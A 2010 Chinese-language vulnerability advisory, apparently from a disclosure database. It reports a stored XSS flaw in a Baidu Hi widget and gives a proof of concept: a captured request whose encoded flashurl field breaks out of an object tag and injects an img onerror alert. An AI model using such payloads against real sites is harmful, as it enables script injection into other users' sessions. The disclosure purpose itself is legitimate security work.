hi.baidu widget(11174) xss Bug

Author: hi_heige
Blog: http://hi.baidu.com/hi_heige
Team: http://www.80vul.com
date: 2010年6月25日

一综述
百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的，借此平台，用户可以方便地升级扩展空间的功能，用户之间还可以将自己制作的模块与别人共享,
经过测试发现模块"Mtime时光工具箱"即：http://act.hi.baidu.com/widget/info/11174存在xss漏洞，当攻击者应用该模块，可导致在hi.baidu插入恶意的js/html代码。

二 PoC

应用模块:
http://act.hi.baidu.com/widget/info/11174

抓’提交’的http包

替换http包:

spModuleRef=%7B%22id%22%3A%22%22%2C%22type%22%3A%22flashDisplay%22%2C%22width%22%3A%22162%22%2C%22height%22%3A%22173%22%2C%22flashurl%22%3A%22http%253A//assets.yobo.com/flash/m/101/%2522%253E%253C%252Fobject%253E%253Cimg%2520src%253D2%2520onerror%253Dalert%2528document%252Edomain%2529%253E%253C%2520%2522.swf%22%2C%22flashvars%22%3A%22P%253DGW%257Cengine.yobo.com%257CL%257C10%257CS%257CJLENC9F5tLmmh4fHs3z0qRNnAX4gT90qBCk2Qihl%25252FpW8y2ev1KoznsHjyQ%25253D%25253D%257CU%257C15880%257CD%257C0%257CcID%257C3745125%257CVER%257C0.30%257CK%257C7%257CA%257C0%257CW%257C162%257CH%257C173%22%2C%22tip0.1%22%3A%22false%22%7D

重新提交修改后的http包。

三补丁[fix]

等待官方补丁

← hi.baidu widget(11258) xss Bug

hi.baidu widget(11173) xss Bug →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

hi.baidu widget(11174) xss Bug

0 条评论。

发表评论